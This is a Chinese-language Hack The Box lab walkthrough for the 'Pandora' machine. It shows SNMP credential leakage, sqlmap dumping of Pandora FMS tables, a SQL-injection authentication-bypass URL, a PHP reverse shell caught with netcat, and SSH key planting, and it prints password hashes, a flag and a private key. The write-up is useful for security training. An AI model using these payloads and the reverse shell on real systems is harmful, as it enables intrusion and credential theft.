Hackthebox - Pandora 靶场实战

admin 2022年5月23日01:08:02安全文章评论8 views25305字阅读84分21秒阅读模式

Hackthebox - Pandora

靶场信息

Hackthebox - Pandora 靶场实战

靶场类型

Hackthebox - Pandora 靶场实战

信息搜集

首先使用nmap进行端口扫描

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.136
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 02:29 EST
Nmap scan report for 10.10.11.136
Host is up (0.22s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=1/17%OT=22%CT=1%CU=41376%PV=Y%DS=2%DC=T%G=Y%TM=61E51AF
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=C)SEQ
OS:(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)OPS(O1=M505ST11NW7%O2=M505ST11NW7%O
OS:3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11NW7%O6=M505ST11)WIN(W1=FE88%W2=
OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   238.86 ms 10.10.14.1
2   239.01 ms 10.10.11.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.77 seconds

将DNS解析添加到hosts

echo 10.10.11.136 pandora.htb >> /etc/hosts

然后去看一下80端口

Hackthebox - Pandora 靶场实战

在页面上没看到什么有用的东西,fuzz下目录看看吧

┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://pandora.htb/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt

        /'___  /'___           /'___       
       / __/ / __/  __  __  / __/       
         ,__\  ,__/ /    ,__      
          _/   _/  _    _/      
          _    _   ____/   _       
          /_/    /_/   /___/    /_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://pandora.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

assets                  [Status: 301, Size: 311, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
                        [Status: 200, Size: 33560, Words: 13127, Lines: 908]
:: Progress: [20116/20116] :: Job [1/1] :: 119 req/sec :: Duration: [0:03:26] :: Errors: 0 ::

也没看到什么有用的东西,有点迷惑

扫描个UDP端口看看

┌──(root💀kali)-[~/Desktop]
└─# nmap -sC -sV -sU -top-ports=20 pandora.htb                                                                                                                                                                130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 20:30 EST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.27s latency).

PORT      STATE         SERVICE      VERSION
53/udp    closed        domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   open|filtered ntp
135/udp   closed        msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open          snmp         SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 30
|_  snmpEngineTime: 20m46s
| snmp-processes: 
|   1: 

|   2: 

|   3: 

|_  4: 
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 20m46.36s (124636 timeticks)
|_snmp-win32-software: 
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp open|filtered unknown
Service Info: Host: pandora

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.89 seconds

这里可以看到有一个snmp开着,而且明显还有信息没有显示出来,我感觉这就是突破口

漏洞利用

使用snmpwalk扫描一下pandora.htb

snmpwalk -v 2c pandora.htb -c public > nmap
iso.3.6.1.2.1.25.4.2.1.5.870 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"

得到了一个账号密码

username = daniel
password = HotelBabylon23

去ssh登录试试

┌──(root💀kali)-[~/Desktop]
└─# ssh [email protected] 
[email protected]'s password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 18 Jan 01:47:00 UTC 2022

  System load:  0.12              Processes:             263
  Usage of /:   64.4% of 4.87GB   Users logged in:       1
  Memory usage: 12%               IPv4 address for eth0: 10.10.11.136
  Swap usage:   0%

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Jan 18 01:12:05 2022 from 10.10.14.20
[email protected]:~$ whoami&&id
daniel
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)

成功登录

[email protected]:~$ cd ../
[email protected]:/home$ ls
daniel  matt
[email protected]:/home$ cd matt
[email protected]:/home/matt$ ls
LinEnum.sh  snmp-mibs-downloader  snmp-mibs-downloader_1.2.tar.xz  user.txt
[email protected]:/home/matt$ cat user.txt 
cat: user.txt: Permission denied

这里可以看到,有一个matt账户,并且我们没有权限访问user.txt的flag文件,那就是得想办法提权到matt用户

权限提升

Matt

查看一下端口

[email protected]:/home/matt$ netstat -tuplen
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode      PID/Program name    
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      101        21170      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      0          24732      -                   
tcp        0      0 0.0.0.0:5577            0.0.0.0:*               LISTEN      1000       119305     -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      114        24400      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      0          24759      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      0          24585      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           101        21169      -                   
udp        0      0 0.0.0.0:161             0.0.0.0:*                           0          24804      -                   
udp6       0      0 ::1:161                 :::*                                0          24805      -

这里好像有本地网络服务pandora,查看一下

[email protected]:/home/matt$ curl pandora.htb
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">

确实存在,使用ssh把端口转发出来

┌──(root💀kali)-[~/Desktop]
└─# ssh -L 80:127.0.0.1:80 [email protected]
[email protected]'s password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 18 Jan 01:54:11 UTC 2022

  System load:  0.0               Processes:             273
  Usage of /:   64.6% of 4.87GB   Users logged in:       1
  Memory usage: 19%               IPv4 address for eth0: 10.10.11.136
  Swap usage:   0%

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Jan 18 01:47:01 2022 from 10.10.14.17

代理成功,我们去访问一下127.0.0.1

Hackthebox - Pandora 靶场实战

这里发现了一个关键线索v7.0NG.742_FIX_PERL2020

去搜索一下这个版本有没有漏洞

https://nvd.nist.gov/vuln/detail/CVE-2020-26518#range-6019001

找到了一个sql注入,咱们去注入吧

┌──(root💀kali)-[~/Desktop]
└─# sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora -T tsessions_php -C id_session,data --dump

+----------------------------+------------------------------------------------------+
| id_session                 | data                                                 |
+----------------------------+------------------------------------------------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel";                             |
| 0ahul7feb1l9db7ffp8d25sjba | NULL                                                 |
| 1um23if7s531kqf5da14kf5lvm | NULL                                                 |
| 22eqdjecn219cpni093reba8ee | NULL                                                 |
| 27ffs3tj8rpvrm2hd0juphhda7 | id_usuario|s:6:"daniel";                             |
| 2e25c62vc3odbppmg6pjbf9bum | NULL                                                 |
| 2uibrnof5j1k45g9u15tngrlju | NULL                                                 |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel";                             |
| 3me2jjab4atfa5f8106iklh4fc | NULL                                                 |
| 4f51mju7kcuonuqor3876n8o02 | NULL                                                 |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel";                             |
| 59qae699l0971h13qmbpqahlls | NULL                                                 |
| 5fihkihbip2jioll1a8mcsmp6j | NULL                                                 |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel";                             |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel";                             |
| 6ctchv9r2gg7c6arpv4cipcfol | NULL                                                 |
| 81f3uet7p3esgiq02d4cjj48rc | NULL                                                 |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel";                             |
| 8upeameujo9nhki3ps0fu32cgd | NULL                                                 |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel";                             |
| a3a49kc938u7od6e6mlip1ej80 | NULL                                                 |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel";                             |
| cbo2bdg3g7vfqgjmcuc75bq0aj | NULL                                                 |
| cojb6rgubs18ipb35b3f6hf0vp | NULL                                                 |
| cor29cq7l3ae4g8a423as7p422 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; |
| d0carbrks2lvmb90ergj7jv6po | NULL                                                 |
| dsot94harh6hraanl60m698enq | NULL                                                 |
| e58oalliogbu7jb1dc75dos90j | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";                             |
| fikt9p6i78no7aofn74rr71m85 | NULL                                                 |
| fqd96rcv4ecuqs409n5qsleufi | NULL                                                 |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";                             |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;  |
| gf40pukfdinc63nm5lkroidde6 | NULL                                                 |
| heasjj8c48ikjlvsf1uhonfesv | NULL                                                 |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel";                             |
| idlkl6lfsk05omgp2t42b8rlq9 | id_usuario|s:6:"daniel";                             |
| j4415tiqm7kck5lkovi4qocch9 | NULL                                                 |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel";                             |
| knh7p9utl2089rprmm46nku2lr | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; |
| kp90bu1mlclbaenaljem590ik3 | NULL                                                 |
| l5817gd0prg6udd5sb5bufcvap | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL                                                 |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel";                             |
| og8c3bqae2pts9i0l6c3s2u9aq | NULL                                                 |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel";                             |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel";                             |
| qh9k9iaginhd7qqu7sda2ar27o | id_usuario|s:6:"daniel";                             |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL                                                 |
| r02qbtlhv3uq49mv0f4a3s4k8v | NULL                                                 |
| r097jr6k9s7k166vkvaj17na1u | NULL                                                 |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel";                             |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel";                             |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel";                             |
| v0l5i5vhf7bsk2n3k2f90nu4bi | NULL                                                 |
+----------------------------+------------------------------------------------------+
┌──(root💀kali)-[~/Desktop]
└─# sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora -T tpassword_history -C id_pass,id_user,data_end,password,data_begin --dump

+---------+---------+----------+----------------------------------+------------+
| id_pass | id_user | data_end | password                         | data_begin |
+---------+---------+----------+----------------------------------+------------+
| 1       | matt    |          | f655f807365b6dc602b31ab3d6d43acc |            |
| 2       | daniel  |          | 76323c174bd49ffbbdedf678f6cc89a6 |            |
+---------+---------+----------+----------------------------------+------------+

首先使用如下poc进行跳过

http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO

然后直接访问http://127.0.0.1/pandora_console/即可以admin权限进行登录

Hackthebox - Pandora 靶场实战

Hackthebox - Pandora 靶场实战

选择 Admin tools -> File manager

https://github.com/pentestmonkey/php-reverse-shell

使用该shell,先保存到本地然后稍微修改一下

Hackthebox - Pandora 靶场实战

然后upload file上传

Hackthebox - Pandora 靶场实战

传上去后在http://127.0.0.1/pandora_console/images/phpshell.php可以找到shell

本地启动一个nc监听端口,然后访问该shell

┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444                     
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.11.136] 58582
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 03:15:11 up 15 min,  4 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
daniel   pts/0    10.10.14.17      03:00   14:23   0.03s  0.03s -bash
daniel   pts/1    10.10.14.20      03:01   11:35   0.26s  0.21s python3 sqlpwn.py -t localhost
daniel   pts/2    10.10.14.128     03:02   11.00s  0.20s  0.02s ssh -L 8000:localhost:80 dan[email protected]
daniel   pts/4    127.0.0.1        03:14   15.00s  0.02s  0.02s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$ whoami&&id
matt
uid=1000(matt) gid=1000(matt) groups=1000(matt)

成功拿到matt权限的shell

$ cat user.txt
083fe340ff06c9a855f56ee98eaa62fd

成功拿到user权限的flag文件

Root

[email protected]:/home/matt$ find / -perm -u=s 2> /dev/null
find / -perm -u=s 2> /dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1

检查一下可利用文件

其中/usr/bin/pandora_backup可利用

[email protected]:/home/matt$ sudo /usr/bin/pandora_backup
sudo /usr/bin/pandora_backup
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin

直接利用会错误,我们需要一个更加稳定的shell

由于我们没有matt的密码,所以无法直接用ssh登录,也没找到ssh的秘钥,所以我们自己生成一个

[email protected]:/home/matt$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/matt/.ssh/id_rsa): 

Enter passphrase (empty for no passphrase): 

Enter same passphrase again: 

Your identification has been saved in /home/matt/.ssh/id_rsa
Your public key has been saved in /home/matt/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:SDMstiuKB3DRqypXDzX385OV0v8MrIh+lQE0alNduQ4 [email protected]
The key's randomart image is:
+---[RSA 3072]----+
|   .     .+. ... |
|  . ..   o... .  |
|   .o.= +  .   . |
|. ...+o=..  E .  |
|.. ....oS.   * . |
|. . o.    o +.=  |
| o...o     + +o. |
|+.o.  .  ...+. o.|
|+o     .o.. ..  +|
+----[SHA256]-----+
[email protected]:/home/matt$ cd .ssh
cd .ssh
[email protected]:/home/matt/.ssh$ ls
ls
id_rsa  id_rsa.pub
[email protected]:/home/matt/.ssh$ cat id_rsa.pub > authorized_keys
cat id_rsa > authorized_keys
[email protected]:/home/matt/.ssh$ chmod 700 authorized_keys
chmod 600 authorized_keys
[email protected]:/home/matt/.ssh$ cat id_rsa
cat authorized_keys
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
┌──(root💀kali)-[~/Desktop]
└─# vim id_rsa    
                                                                                                                                                                                                                    
┌──(root💀kali)-[~/Desktop]
└─# chmod 700 id_rsa    
                                                                                                                                                                                                                    
┌──(root💀kali)-[~/Desktop]
└─# cat id_rsa     
-----BEGIN OPENSSH PRIVATE KEY-----
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

然后使用ssh进行登录

┌──(root💀kali)-[~/Desktop]
└─# ssh [email protected] -i id_rsa
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 18 Jan 05:59:56 UTC 2022

  System load:  0.09              Processes:             280
  Usage of /:   63.0% of 4.87GB   Users logged in:       1
  Memory usage: 9%                IPv4 address for eth0: 10.10.11.136
  Swap usage:   0%

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

[email protected]:~$ whoami&&id
matt
uid=1000(matt) gid=1000(matt) groups=1000(matt)

